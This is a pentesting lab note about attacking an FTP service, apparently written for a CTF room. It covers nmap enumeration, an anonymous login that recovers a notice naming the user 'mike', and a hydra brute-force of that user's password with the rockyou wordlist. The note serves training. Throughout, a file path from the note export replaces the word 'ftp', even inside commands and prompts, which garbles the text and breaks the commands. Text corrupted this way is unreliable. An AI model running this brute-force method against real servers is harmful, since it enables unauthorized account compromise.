Ftp

Understanding docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp
What is docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp?

File Transfer Protocol (docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp) is, as the name suggests , a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this, and- as we'll come on to later- relays commands and data in a very efficient way.

How does docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp work?
A typical docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp session operates using two channels:

a command (sometimes called the control) channel
a data channel.

As their names imply, the command channel is used for transmitting commands as well as replies to those commands, while the data channel is used for transferring data.

docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.

While the session is open, the client may execute docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp commands on the server.

Active vs Passive

The docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp server may support either Active or Passive connections, or both.

In an Active docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp connection, the client opens a port and listens. The server is required to actively connect to it.
In a Passive docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp connection, the server opens a port and listens (passively) and the client connects to it.

This separation of command information and data into separate channels is a way of being able to send commands to the server without having to wait for the current data transfer to finish. If both channels were interlinked, you could only enter commands in between data transfers, which wouldn't be efficient for either large file transfers, or slow internet connections.

More Details:

You can find more details on the technical function, and implementation of, docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp on the Internet Engineering Task Force website: [[https]]://www.ietf.org/rfc/rfc959.txt. The IETF is one of a number of standards agencies, who define and regulate internet standards.

Enumerating docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp
Enumeration

By now, I don't think I need to explain any further how enumeration is key when attacking network services and protocols. You should, by now, have enough experience with nmap to be able to port scan effectively. If you get stuck using any tool- you can always use "tool [-h / -help / --help]" to find out more about it's function and syntax. Equally, man pages are extremely useful for this purpose. They can be reached using "man [tool]".
Method

We're going to be exploiting an anonymous docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp login, to see what files we can access- and if they contain any information that might allow us to pop a shell on the system. This is a common pathway in CTF challenges, and mimics a real-life careless implementation of docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp servers.

Resources

As we're going to be logging in to an docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp server, we will need to make sure an docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp client is installed on the system. There should be one installed by default on most [[Linux]] operating systems, such as Kali or [[Parrot]] OS. You can test if there is one by typing "docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp" into the console. If you're brought to a prompt that says: "docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp>", then you have a working docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp client on your system. If not, it's a simple matter of using "sudo apt install docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp" to install one.
Alternative Enumeration Methods

It's worth noting that some vulnerable versions of in.ftpd and some other docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp server variants return different responses to the "cwd" command for home directories which exist and those that don’t. This can be exploited because you can issue cwd commands before authentication, and if there's a home directory- there is more than likely a user account to go with it. While this bug is found mainly within legacy systems, it's worth knowing about, as a way to exploit docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp.

This vulnerability is documented at: [[https]]://www.[[exploit-db]].com/exploits/20745

$ nmap -vv -sV 10.10.28.126
-vv high verbosity, -sV version
discovers port 21 -0 docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp but version vsftpd
discovers port 80 -[[http]]

Now we know what type of docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp server we're dealing with we can check to see if we are able to login anonymously to the docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp server. We can do this using by typing "docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp [IP]" into the console, and entering "anonymous", and no password when prompted.

docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp 10.10.28.126
Connected to 10.10.28.126.
220 Welcome to the administrator docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp service.
Name (10.10.28.126:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 353 Apr 24 2020 PUBLIC_NOTICE.txt
docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp> get PUBLIC_NOTICE.txt
local: PUBLIC_NOTICE.txt remote: PUBLIC_NOTICE.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for PUBLIC_NOTICE.txt (353 bytes).
226 Transfer complete.
353 bytes received in 0.00 secs (158.4950 kB/s)

retrieve from directory
cat PUBLIC_NOTICE.txt
===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================

Hello,

I hope everyone is aware that the
docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp server will not be available
over the weekend- we will be
carrying out routine system
maintenance. Backups will be
made to my account so I reccomend
encrypting any sensitive data.

Cheers,

Mike

Exploiting docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp

Hydra
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.46.241 docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp

Let's break it down:
SECTION FUNCTION
hydra Runs the hydra tool
-t 4 Number of parallel connections per target
-l [user] Points to the user who's account you're trying to compromise
-P [path to dictionary] Points to the file containing the list of possible passwords
-vV Sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine IP] The IP address of the target machine
docs/Pentesting Notes/Attacks/Hacking Tools/Network Exploitation/Network Services/ftp / protocol Sets the protocol

[[https]]://medium.com/@gregIT/exploiting-simple-network-services-in-ctfs-ec8735be5eef
[[https]]://attack.mitre.org/techniques/T1210/
[[https]]://www.nextgov.com/cybersecurity/2019/10/nsa-warns-vulnerabilities-multiple-vpn-services/160456/